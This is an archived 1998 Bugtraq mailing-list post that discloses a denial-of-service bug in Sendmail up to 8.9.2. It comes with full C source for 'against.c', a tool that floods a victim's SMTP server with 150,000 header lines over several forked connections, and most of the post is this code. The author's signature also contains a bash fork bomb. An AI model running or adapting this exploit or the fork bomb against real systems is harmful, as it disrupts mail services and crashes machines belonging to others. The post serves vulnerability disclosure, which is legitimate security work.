Sendmail 8.9.2 Denial of Service exploit code.
94909bd0dc366bd42f8c781b305c85ac38cce1c99b9811467f3d2efef15067f9
Date: Sat, 12 Dec 1998 19:39:56 +0100
From: Michal Zalewski <lcamtuf@IDS.PL>
To: BUGTRAQ@netspace.org
Subject: ** Sendmail 8.9.2 DoS - exploit ** get what you want!
Parts/Attachments:
1 Shown 32 lines Text
2 OK ~2 KB Text, ""
----------------------------------------
Hello again. Yesterday, I published some rather laconic information about
two bugs in Sendmail up to 8.9.2, and decided to post only short
description of problem + suggested patch (instead of exploit), to give
developers a chance. Unfortunately, I put together information about two
completely different problems in single posting, and it confuded a lot of
people. So, to kill any senseless discussions - again:
- The first one was 'redirection attack'; I said you could call it 'bug'
instead of 'feature', but as noone likes anonymous mailbombing,
network overloading / scanning, it's good to apply sendmail.cf patch
included in original posting; without it, your relay could be abused in
many painful ways. And yes, attack has been confirmed with 8.9.2 and
sendmail.cf from 8.9.2 with relaying enabled. I don't think there's
anything left to talk about. Dot.
- The second one was DoS attack during headers parsing - and this is
a bug, *confirmed on 8.9.2*. I included simple patch to source tree.
Unfortunately, all feedback we received from developers was one-line
response 'It has been fixed in 8.9.2'. Bullshit (sorry). I decided
not to publish an exploit, but now I realized there's no chance for
response from vendors if there's no real danger. So here it is.
Attached file, against.c, should perform very 'light' attack, only
for testing purposes. If you noticed increased LA during attack,
your machine is vunerable. You had enough time to patch your system
- don't blame me, but vendors. EOF.
_______________________________________________________________________
Michal Zalewski [lcamtuf@ids.pl] [ENSI / marchew] [dione.ids.pl SYSADM]
[http://linux.lepszy.od.kobiety.pl/~lcamtuf/] <=--=> bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]
------------------------------snip here----------------------------------
/*
against.c - Another Sendmail (and pine ;-) DoS (up to 8.9.2)
(c) 1999 by <marchew@linux.lepszy.od.kobiety.pl>
Usage: ./against existing_user_on_victim_host victim_host
Example: ./against nobody lamers.net
*/
#include <stdio.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdarg.h>
#include <errno.h>
#include <signal.h>
#include <getopt.h>
#include <stdlib.h>
#include <string.h>
#define MAXCONN 5
#define LINES 150000
struct hostent *hp;
struct sockaddr_in s;
int suck,loop,x;
int main(int argc,char* argv[]) {
printf("against.c - another Sendmail DoS (up to 8.9.2)\n");
if (argc-3) {
printf("Usage: %s victim_user victim_host\n",argv[0]);
exit(0);
}
hp=gethostbyname(argv[2]);
if (!hp) {
perror("gethostbyname");
exit(1);
}
fprintf(stderr,"Doing mess: ");
for (;loop<MAXCONN;loop++) if (!(x=fork())) {
FILE* d;
bcopy(hp->h_addr,(void*)&s.sin_addr,hp->h_length);
s.sin_family=hp->h_addrtype;
s.sin_port=htons(25);
if ((suck=socket(AF_INET,SOCK_STREAM,0))<0) perror("socket");
if (connect(suck,(struct sockaddr *)&s,sizeof(s))) perror("connect");
if (!(d=fdopen(suck,"w"))) { perror("fdopen"); exit(0); }
usleep(100000);
fprintf(d,"helo tweety\n");
fprintf(d,"mail from: tweety@polbox.com\n");
fprintf(d,"rcpt to: %s@%s\n",argv[1],argv[2]);
fprintf(d,"data\n");
usleep(100000);
for(loop=0;loop<LINES;loop++) {
if (!(loop%100)) fprintf(stderr,".");
fprintf(d,"To: x\n");
}
fprintf(d,"\n\n\nsomedata\n\n\n");
fprintf(d,".\n");
sleep(1);
fprintf(d,"quit\n");
fflush(d);
sleep(100);
shutdown(suck,2);
close(suck);
exit(0);
}
waitpid(x,&loop,0);
fprintf(stderr,"ok\n");
return 0;
}